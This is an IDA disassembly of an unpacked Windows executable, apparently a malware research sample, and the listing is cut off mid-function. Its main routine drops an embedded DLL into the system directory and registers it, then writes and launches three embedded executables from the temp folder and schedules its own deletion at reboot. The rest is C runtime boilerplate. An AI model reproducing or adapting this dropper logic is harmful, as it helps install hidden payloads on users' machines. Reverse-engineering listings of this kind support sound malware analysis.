;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2EDD6F656D6BE9CCBFAE436D84CA4771
; File Name : u:\work\2edd6f656d6be9ccbfae436d84ca4771_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_401090+70�p
; sub_401090+C5�p ...
arg_0 = dword ptr 4
arg_4 = word ptr 8
arg_8 = dword ptr 0Ch
movzx eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push 0Ah
push eax
push esi
call ds:dword_405018 ; FindResourceA
mov edi, eax
push edi
push esi
call ds:dword_405014 ; LoadResource
push edi
push esi
mov ebx, eax
call ds:dword_405010 ; SizeofResource
push ebx
mov edi, eax
call ds:dword_40500C ; LockResource
mov ecx, [esp+0Ch+arg_8]
push 0
push 80h
push 2
push 0
push 1
push 0C0000000h
push ecx
mov ebx, eax
call ds:dword_405008 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_401074
push 0
lea edx, [esp+10h+arg_4]
push edx
push edi
push ebx
push esi
call ds:dword_405004 ; WriteFile
test eax, eax
push esi
jnz short loc_40107A
call ds:dword_405000 ; CloseHandle
loc_401074: ; CODE XREF: sub_401000+57�j
pop edi
pop esi
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40107A: ; CODE XREF: sub_401000+6C�j
call ds:dword_405000 ; CloseHandle
pop edi
pop esi
mov al, 1
pop ebx
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401090 proc near ; CODE XREF: .text:00401407�p
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
sub esp, 310h
mov eax, dword_407030
push ebx
push esi
push edi
mov [esp+31Ch+var_4], eax
push 104h
lea eax, [esp+320h+var_108]
push eax
push 0
call ds:dword_40503C ; GetModuleFileNameA
push 104h
lea ecx, [esp+320h+var_20C]
push ecx
call ds:dword_405038 ; GetSystemDirectoryA
push 104h
lea edx, [esp+320h+var_20C]
push edx
lea eax, [esp+324h+var_310]
push eax
call ds:dword_405034 ; lstrcpyn
mov esi, ds:dword_405030
push offset aIea_dll ; "\\iea.dll"
lea ecx, [esp+320h+var_310]
push ecx
call esi ; lstrcat
lea edx, [esp+31Ch+var_310]
push edx
push 65h
push 0
call sub_401000
add esp, 0Ch
lea eax, [esp+31Ch+var_310]
push eax
call ds:dword_40502C ; LoadLibraryA
mov edi, eax
push offset aDllregisterser ; "DllRegisterServer"
push edi
call ds:dword_405028 ; GetProcAddress
test eax, eax
jz short loc_401127
call eax
loc_401127: ; CODE XREF: sub_401090+93�j
push edi
call ds:dword_405024 ; FreeLibrary
mov edi, ds:dword_405020
lea ecx, [esp+31Ch+var_310]
push ecx
push 104h
call edi ; GetTempPathA
push offset aClr_exe ; "\\clr.exe"
lea edx, [esp+320h+var_310]
push edx
call esi ; lstrcat
lea eax, [esp+31Ch+var_310]
push eax
push 66h
push 0
call sub_401000
mov ebx, ds:dword_4050F4
add esp, 0Ch
push 9
push 0
push 0
lea ecx, [esp+328h+var_310]
push ecx
push offset aOpen ; "open"
push 0
call ebx
lea edx, [esp+31Ch+var_310]
push edx
push 104h
call edi ; GetTempPathA
push offset aHp_exe ; "\\hp.exe"
lea eax, [esp+320h+var_310]
push eax
call esi ; lstrcat
lea ecx, [esp+31Ch+var_310]
push ecx
push 67h
push 0
call sub_401000
add esp, 0Ch
push 9
push 0
push 0
lea edx, [esp+328h+var_310]
push edx
push offset aOpen ; "open"
push 0
call ebx
lea eax, [esp+31Ch+var_310]
push eax
push 104h
call edi ; GetTempPathA
push offset aFf_exe ; "\\ff.exe"
lea ecx, [esp+320h+var_310]
push ecx
call esi ; lstrcat
lea edx, [esp+31Ch+var_310]
push edx
push 68h
push 0
call sub_401000
add esp, 0Ch
push 9
push 0
push 0
lea eax, [esp+328h+var_310]
push eax
push offset aOpen ; "open"
push 0
call ebx
push 4
push 0
lea ecx, [esp+324h+var_108]
push ecx
call ds:dword_40501C ; MoveFileExA
mov ecx, [esp+31Ch+var_4]
pop edi
pop esi
xor eax, eax
pop ebx
call sub_40124E
add esp, 310h
retn 10h
sub_401090 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40124E
loc_40121D: ; CODE XREF: sub_40124E:loc_401257�j
push 8
push offset stru_405160
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call loc_4014C3
pop ecx
pop ecx
jmp short loc_401241
; END OF FUNCTION CHUNK FOR sub_40124E
; =============== S U B R O U T I N E =======================================
sub_40123A proc near ; DATA XREF: .rdata:stru_405160�o
xor eax, eax
inc eax
retn
sub_40123A endp
; =============== S U B R O U T I N E =======================================
sub_40123E proc near ; DATA XREF: .rdata:stru_405160�o
mov esp, [ebp-18h]
sub_40123E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40124E
loc_401241: ; CODE XREF: sub_40124E-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_405048 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_40124E
; =============== S U B R O U T I N E =======================================
sub_40124E proc near ; CODE XREF: sub_401090+17F�p
; sub_4018FC+167�p ...
; FUNCTION CHUNK AT 0040121D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00401241 SIZE 0000000D BYTES
cmp ecx, dword_407030
jnz short loc_401257
retn
; ---------------------------------------------------------------------------
loc_401257: ; CODE XREF: sub_40124E+6�j
jmp loc_40121D
sub_40124E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40125C proc near ; CODE XREF: .text:00401387�p
; .text:004013AD�p ...
arg_0 = dword ptr 4
cmp dword_4072A8, 1
jnz short loc_40126A
call sub_401A73
loc_40126A: ; CODE XREF: sub_40125C+7�j
push [esp+arg_0]
call sub_4018FC
push 0FFh
call off_407034
pop ecx
pop ecx
retn
sub_40125C endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_405170
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_402310
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_405058 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_4072BC, ecx
mov eax, [esi+4]
mov dword_4072C8, eax
mov edx, [esi+8]
mov dword_4072CC, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_4072C0, esi
cmp ecx, 2
jz short loc_4012E1
or esi, 8000h
mov dword_4072C0, esi
loc_4012E1: ; CODE XREF: .text:004012D3�j
shl eax, 8
add eax, edx
mov dword_4072C4, eax
xor esi, esi
push esi
mov edi, ds:dword_40504C
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_40131C
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_40131C
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401334
cmp eax, 20Bh
jz short loc_401321
loc_40131C: ; CODE XREF: .text:004012FB�j
; .text:00401308�j ...
mov [ebp-1Ch], esi
jmp short loc_401348
; ---------------------------------------------------------------------------
loc_401321: ; CODE XREF: .text:0040131A�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_40131C
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_401342
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: .text:00401313�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_40131C
xor eax, eax
cmp [ecx+0E8h], esi
loc_401342: ; CODE XREF: .text:00401332�j
setnz al
mov [ebp-1Ch], eax
loc_401348: ; CODE XREF: .text:0040131F�j
push esi
call sub_4022BE
pop ecx
test eax, eax
jnz short loc_401374
cmp dword_4072A8, 1
jnz short loc_401361
call sub_401A73
loc_401361: ; CODE XREF: .text:0040135A�j
push 1Ch
call sub_4018FC
push 0FFh
call sub_401761
pop ecx
pop ecx
loc_401374: ; CODE XREF: .text:00401351�j
call sub_40221C
mov [ebp-4], esi
call sub_402071
test eax, eax
jge short loc_40138D
push 1Bh
call sub_40125C
pop ecx
loc_40138D: ; CODE XREF: .text:00401383�j
call ds:dword_405054 ; GetCommandLineA
mov dword_407834, eax
call sub_401F4F
mov dword_4072A0, eax
call sub_401EAD
test eax, eax
jge short loc_4013B3
push 8
call sub_40125C
pop ecx
loc_4013B3: ; CODE XREF: .text:004013A9�j
call sub_401C7A
test eax, eax
jge short loc_4013C4
push 9
call sub_40125C
pop ecx
loc_4013C4: ; CODE XREF: .text:004013BA�j
push 1
call loc_401791
pop ecx
mov [ebp-28h], eax
cmp eax, esi
jz short loc_4013DA
push eax
call sub_40125C
pop ecx
loc_4013DA: ; CODE XREF: .text:004013D1�j
mov [ebp-44h], esi
lea eax, [ebp-70h]
push eax
call ds:dword_405050 ; GetStartupInfoA
call sub_401C1D
mov [ebp-20h], eax
test byte ptr [ebp-44h], 1
jz short loc_4013FB
movzx eax, word ptr [ebp-40h]
jmp short loc_4013FE
; ---------------------------------------------------------------------------
loc_4013FB: ; CODE XREF: .text:004013F3�j
push 0Ah
pop eax
loc_4013FE: ; CODE XREF: .text:004013F9�j
push eax
push dword ptr [ebp-20h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_401090
mov edi, eax
mov [ebp-2Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_40141C
push edi
call sub_4018BC
loc_40141C: ; CODE XREF: .text:00401414�j
call sub_4018DE
jmp short loc_40144E
; =============== S U B R O U T I N E =======================================
sub_401423 proc near ; DATA XREF: .rdata:stru_405170�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-24h], ecx
push eax
push ecx
call sub_401AAC
pop ecx
pop ecx
retn
sub_401423 endp
; =============== S U B R O U T I N E =======================================
sub_401437 proc near ; DATA XREF: .rdata:stru_405170�o
mov esp, [ebp-18h]
mov edi, [ebp-24h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_401449
push edi
call sub_4018CD
loc_401449: ; CODE XREF: sub_401437+A�j
call sub_4018ED
loc_40144E: ; CODE XREF: .text:00401421�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
sub_401437 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40145D proc near ; DATA XREF: .data:00407004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_407030
test eax, eax
jz short loc_401473
cmp eax, 0BB40E64Eh
jnz short locret_4014C1
loc_401473: ; CODE XREF: sub_40145D+D�j
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_40506C ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_405068 ; GetCurrentProcessId
xor esi, eax
call ds:dword_405064 ; GetCurrentThreadId
xor esi, eax
call ds:dword_405060 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_40505C ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_407030, esi
jnz short loc_4014C0
mov dword_407030, 0BB40E64Eh
loc_4014C0: ; CODE XREF: sub_40145D+57�j
pop esi
locret_4014C1: ; CODE XREF: sub_40145D+14�j
leave
retn
sub_40145D endp
; ---------------------------------------------------------------------------
loc_4014C3: ; CODE XREF: sub_40124E-1D�p
push 118h
push offset stru_405368
call __SEH_prolog
mov eax, dword_407030
mov [ebp-1Ch], eax
mov eax, dword_4072AC
xor ecx, ecx
cmp eax, ecx
jz short loc_401504
mov [ebp-4], ecx
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
pop ecx
pop ecx
; START OF FUNCTION CHUNK FOR sub_4014FF
loc_4014F2: ; CODE XREF: sub_4014FF+3�j
or dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_401603
; END OF FUNCTION CHUNK FOR sub_4014FF
; =============== S U B R O U T I N E =======================================
sub_4014FB proc near ; DATA XREF: .rdata:stru_405368�o
xor eax, eax
inc eax
retn
sub_4014FB endp
; =============== S U B R O U T I N E =======================================
sub_4014FF proc near ; DATA XREF: .rdata:stru_405368�o
; FUNCTION CHUNK AT 004014F2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401603 SIZE 00000007 BYTES
mov esp, [ebp-18h]
jmp short loc_4014F2
sub_4014FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_401504: ; CODE XREF: .text:004014E3�j
mov eax, [ebp+8]
dec eax
jz short loc_401520
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov dword ptr [ebp-128h], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_401534
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: .text:00401508�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov dword ptr [ebp-128h], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_401534: ; CODE XREF: .text:0040151E�j
mov [ebp-20h], cl
push 104h
lea eax, [ebp-124h]
push eax
push ecx
call ds:dword_40503C ; GetModuleFileNameA
test eax, eax
jnz short loc_401561
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp-124h]
push eax
call sub_402450
pop ecx
pop ecx
loc_401561: ; CODE XREF: .text:0040154C�j
lea ebx, [ebp-124h]
mov eax, ebx
push eax
call sub_402680
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_40159D
mov eax, ebx
push eax
call sub_402680
mov ebx, eax
lea eax, [ebp-124h]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_402550
add esp, 10h
loc_40159D: ; CODE XREF: .text:00401576�j
push ebx
call sub_402680
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp-18h], esp
mov esi, esp
push edi
push esi
call sub_402450
mov edi, offset asc_4051B0 ; "\n\n"
push edi
push esi
call sub_402460
push offset aProgram ; "Program: "
push esi
call sub_402460
push ebx
push esi
call sub_402460
push edi
push esi
call sub_402460
push dword ptr [ebp-128h]
push esi
call sub_402460
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_40234D
add esp, 3Ch
; START OF FUNCTION CHUNK FOR sub_4014FF
loc_401603: ; CODE XREF: sub_4014FF-9�j
push 3
call sub_4018CD
; END OF FUNCTION CHUNK FOR sub_4014FF
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401660 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_401729
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
push ebx
call sub_4027FA
add esp, 4
or eax, eax
jz short loc_40171B
loc_4016A0: ; CODE XREF: sub_401660+B2�j
cmp esi, 0FFFFFFFFh
jz short loc_401722
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4+4]
or eax, eax
jz short loc_401709
push esi
push ebp
lea ebp, [ebx+10h]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_401709
js short loc_401714
mov edi, [ebx+8]
push ebx
call sub_40270C
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_40274E
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4027E2
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
mov eax, [edi+ecx*4+8]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
loc_401709: ; CODE XREF: sub_401660+4E�j
; sub_401660+68�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4016A0
; ---------------------------------------------------------------------------
loc_401714: ; CODE XREF: sub_401660+6A�j
mov eax, 0
jmp short loc_40173E
; ---------------------------------------------------------------------------
loc_40171B: ; CODE XREF: sub_401660+3E�j
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
loc_401722: ; CODE XREF: sub_401660+43�j
mov eax, 1
jmp short loc_40173E
; ---------------------------------------------------------------------------
loc_401729: ; CODE XREF: sub_401660+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_40274E
add esp, 8
pop ebp
mov eax, 1
loc_40173E: ; CODE XREF: sub_401660+B9�j
; sub_401660+C7�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401660 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_40274E
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_401761 proc near ; CODE XREF: .text:0040136D�p
; sub_4017FB+BA�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_40504C ; GetModuleHandleA
test eax, eax
jz short loc_401786
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_405028 ; GetProcAddress
test eax, eax
jz short loc_401786
push [esp+arg_0]
call eax ; dword_407024
loc_401786: ; CODE XREF: sub_401761+D�j
; sub_401761+1D�j
push [esp+arg_0]
call ds:dword_405048 ; ExitProcess
int 3 ; Trap to Debugger
loc_401791: ; CODE XREF: .text:004013C6�p
mov eax, dword_407830
test eax, eax
jz short loc_4017A1
push [esp+arg_0]
call eax
pop ecx
loc_4017A1: ; CODE XREF: sub_401761+37�j
push esi
push edi
mov ecx, offset dword_40700C
mov edi, offset dword_407018
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_4017CC
loc_4017B5: ; CODE XREF: sub_401761+65�j
test eax, eax
jnz short loc_4017F8
mov ecx, [esi]
test ecx, ecx
jz short loc_4017C1
call ecx
loc_4017C1: ; CODE XREF: sub_401761+5C�j
add esi, 4
cmp esi, edi
jb short loc_4017B5
test eax, eax
jnz short loc_4017F8
loc_4017CC: ; CODE XREF: sub_401761+52�j
push offset loc_402260
call sub_402AA5
mov esi, offset dword_407000
mov eax, esi
mov edi, offset dword_407008
cmp eax, edi
pop ecx
jnb short loc_4017F6
loc_4017E7: ; CODE XREF: sub_401761+93�j
mov eax, [esi]
test eax, eax
jz short loc_4017EF
call eax
loc_4017EF: ; CODE XREF: sub_401761+8A�j
add esi, 4
cmp esi, edi
jb short loc_4017E7
loc_4017F6: ; CODE XREF: sub_401761+84�j
xor eax, eax
loc_4017F8: ; CODE XREF: sub_401761+56�j
; sub_401761+69�j
pop edi
pop esi
retn
sub_401761 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017FB proc near ; CODE XREF: sub_4018BC+8�p
; sub_4018CD+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
inc esi
cmp dword_4072FC, esi
push edi
jnz short loc_40181B
push [ebp+arg_0]
call ds:dword_405074 ; GetCurrentProcess
push eax
call ds:dword_405070 ; TerminateProcess
loc_40181B: ; CODE XREF: sub_4017FB+E�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_4072F8, esi
mov byte_4072F4, al
jnz short loc_401881
mov ecx, dword_407828
test ecx, ecx
jz short loc_401862
mov eax, dword_407824
sub eax, 4
cmp eax, ecx
jmp short loc_40185B
; ---------------------------------------------------------------------------
loc_401845: ; CODE XREF: sub_4017FB+65�j
mov eax, [eax]
test eax, eax
jz short loc_40184D
call eax
loc_40184D: ; CODE XREF: sub_4017FB+4E�j
mov eax, dword_407824
sub eax, 4
cmp eax, dword_407828
loc_40185B: ; CODE XREF: sub_4017FB+48�j
mov dword_407824, eax
jnb short loc_401845
loc_401862: ; CODE XREF: sub_4017FB+3C�j
mov eax, offset dword_40701C
mov esi, offset dword_407020
cmp eax, esi
mov edi, eax
jnb short loc_401881
loc_401872: ; CODE XREF: sub_4017FB+84�j
mov eax, [edi]
test eax, eax
jz short loc_40187A
call eax
loc_40187A: ; CODE XREF: sub_4017FB+7B�j
add edi, 4
cmp edi, esi
jb short loc_401872
loc_401881: ; CODE XREF: sub_4017FB+32�j
; sub_4017FB+75�j
mov eax, offset dword_407024
mov esi, offset dword_407028
cmp eax, esi
mov edi, eax
jnb short loc_4018A0
loc_401891: ; CODE XREF: sub_4017FB+A3�j
mov eax, [edi]
test eax, eax
jz short loc_401899
call eax
loc_401899: ; CODE XREF: sub_4017FB+9A�j
add edi, 4
cmp edi, esi
jb short loc_401891
loc_4018A0: ; CODE XREF: sub_4017FB+94�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jnz short loc_4018BA
push [ebp+arg_0]
mov dword_4072FC, 1
call sub_401761
loc_4018BA: ; CODE XREF: sub_4017FB+AB�j
pop ebp
retn
sub_4017FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4018BC proc near ; CODE XREF: .text:00401417�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_4017FB
add esp, 0Ch
retn
sub_4018BC endp
; =============== S U B R O U T I N E =======================================
sub_4018CD proc near ; CODE XREF: sub_40125C+1C�p
; sub_401437+D�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4017FB
add esp, 0Ch
retn
sub_4018CD endp
; =============== S U B R O U T I N E =======================================
sub_4018DE proc near ; CODE XREF: .text:loc_40141C�p
push 1
push 0
push 0
call sub_4017FB
add esp, 0Ch
retn
sub_4018DE endp
; =============== S U B R O U T I N E =======================================
sub_4018ED proc near ; CODE XREF: sub_401437:loc_401449�p
push 1
push 1
push 0
call sub_4017FB
add esp, 0Ch
retn
sub_4018ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=8Ch
sub_4018FC proc near ; CODE XREF: sub_40125C+12�p
; .text:00401363�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-8Ch]
sub esp, 10Ch
mov eax, dword_407030
mov ecx, [ebp+8Ch+arg_0]
push ebx
push esi
mov [ebp+8Ch+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_401922: ; CODE XREF: sub_4018FC+33�j
cmp ecx, dword_407040[eax*8]
jz short loc_401931
inc eax
cmp eax, 13h
jb short loc_401922
loc_401931: ; CODE XREF: sub_4018FC+2D�j
mov esi, eax
shl esi, 3
cmp ecx, dword_407040[esi]
jnz loc_401A57
mov eax, dword_4072A8
cmp eax, 1
jz loc_401A2F
cmp eax, edx
jnz short loc_401961
cmp dword_407038, 1
jz loc_401A2F
loc_401961: ; CODE XREF: sub_4018FC+56�j
cmp ecx, 0FCh
jz loc_401A57
push 104h
lea eax, [ebp+8Ch+var_10C]
push eax
push edx
mov [ebp+8Ch+var_8], dl
call ds:dword_40503C ; GetModuleFileNameA
test eax, eax
jnz short loc_401997
lea eax, [ebp+8Ch+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402450
pop ecx
pop ecx
loc_401997: ; CODE XREF: sub_4018FC+89�j
lea edi, [ebp+8Ch+var_10C]
mov eax, edi
push eax
call sub_402680
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_4019CB
mov eax, edi
push eax
call sub_402680
mov edi, eax
lea eax, [ebp+8Ch+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_402550
add esp, 10h
loc_4019CB: ; CODE XREF: sub_4018FC+AB�j
push edi
call sub_402680
push off_407044[esi]
mov ebx, eax
call sub_402680
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_402310
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_402450
push edi
push ebx
call sub_402460
push offset asc_4051B0 ; "\n\n"
push ebx
call sub_402460
push off_407044[esi]
push ebx
call sub_402460
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_40234D
add esp, 2Ch
jmp short loc_401A57
; ---------------------------------------------------------------------------
loc_401A2F: ; CODE XREF: sub_4018FC+4E�j
; sub_4018FC+5F�j
push edx
lea eax, [ebp+8Ch+arg_0]
push eax
lea esi, off_407044[esi]
push dword ptr [esi]
call sub_402680
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_405078 ; GetStdHandle
push eax
call ds:dword_405004 ; WriteFile
loc_401A57: ; CODE XREF: sub_4018FC+40�j
; sub_4018FC+6B�j ...
lea esp, [ebp-8Ch]
mov ecx, [ebp+8Ch+var_4]
call sub_40124E
pop edi
pop esi
pop ebx
add ebp, 8Ch
leave
retn
sub_4018FC endp
; =============== S U B R O U T I N E =======================================
sub_401A73 proc near ; CODE XREF: sub_40125C+9�p
; .text:0040135C�p
mov eax, dword_4072A8
cmp eax, 1
jz short loc_401A8A
test eax, eax
jnz short locret_401AAB
cmp dword_407038, 1
jnz short locret_401AAB
loc_401A8A: ; CODE XREF: sub_401A73+8�j
push 0FCh
call sub_4018FC
mov eax, dword_407300
test eax, eax
pop ecx
jz short loc_401AA0
call eax
loc_401AA0: ; CODE XREF: sub_401A73+29�j
push 0FFh
call sub_4018FC
pop ecx
locret_401AAB: ; CODE XREF: sub_401A73+C�j
; sub_401A73+15�j
retn
sub_401A73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AAC proc near ; CODE XREF: sub_401423+C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, dword_407158
push ebx
mov ecx, offset dword_4070D8
push esi
loc_401ABE: ; CODE XREF: sub_401AAC+25�j
cmp [ecx], edx
jz short loc_401AD3
lea esi, [eax+eax*2]
add ecx, 0Ch
lea esi, ds:4070D8h[esi*4]
cmp ecx, esi
jb short loc_401ABE
loc_401AD3: ; CODE XREF: sub_401AAC+14�j
lea eax, [eax+eax*2]
lea eax, ds:4070D8h[eax*4]
cmp ecx, eax
jnb short loc_401AE5
cmp [ecx], edx
jz short loc_401AE7
loc_401AE5: ; CODE XREF: sub_401AAC+33�j
xor ecx, ecx
loc_401AE7: ; CODE XREF: sub_401AAC+37�j
test ecx, ecx
jz loc_401C10
mov ebx, [ecx+8]
test ebx, ebx
jz loc_401C10
cmp ebx, 5
jnz short loc_401B0B
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_401C19
; ---------------------------------------------------------------------------
loc_401B0B: ; CODE XREF: sub_401AAC+51�j
cmp ebx, 1
jz loc_401C0B
mov eax, dword_407304
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
mov dword_407304, eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_401BFB
mov eax, dword_407150
mov edx, dword_407154
add edx, eax
cmp eax, edx
jge short loc_401B56
lea esi, [eax+eax*2]
lea esi, ds:4070E0h[esi*4]
sub edx, eax
loc_401B4D: ; CODE XREF: sub_401AAC+A8�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_401B4D
loc_401B56: ; CODE XREF: sub_401AAC+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov esi, dword_40715C
jnz short loc_401B72
mov dword_40715C, 83h
jmp short loc_401BE8
; ---------------------------------------------------------------------------
loc_401B72: ; CODE XREF: sub_401AAC+B8�j
cmp ecx, 0C0000090h
jnz short loc_401B86
mov dword_40715C, 81h
jmp short loc_401BE8
